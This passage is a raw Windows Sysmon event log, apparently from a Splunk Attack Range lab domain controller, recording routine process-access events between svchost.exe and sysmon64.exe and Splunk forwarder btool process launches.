13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.572{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.572{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.572{08A6967A-4299-6000-4500-000000009A01}40244028C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{00000000-0000-0000-0000-000000000000}4044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.573{08A6967A-4299-6000-4600-000000009A01}4044C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4299-6000-4500-000000009A01}4024C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.556{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4024C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.556{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4024C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.556{08A6967A-4299-6000-4400-000000009A01}40124016C:\Windows\system32\cmd.exe{00000000-0000-0000-0000-000000000000}4024C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.564{08A6967A-4299-6000-4500-000000009A01}4024C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4299-6000-4400-000000009A01}4012C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.556{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4299-6000-4400-000000009A01}4012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.556{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4400-000000009A01}4012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.540{08A6967A-4299-6000-4300-000000009A01}39923996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{00000000-0000-0000-0000-000000000000}4012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.556{08A6967A-4299-6000-4400-000000009A01}4012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4299-6000-4300-000000009A01}3992C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.540{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4299-6000-4300-000000009A01}3992C:\Program 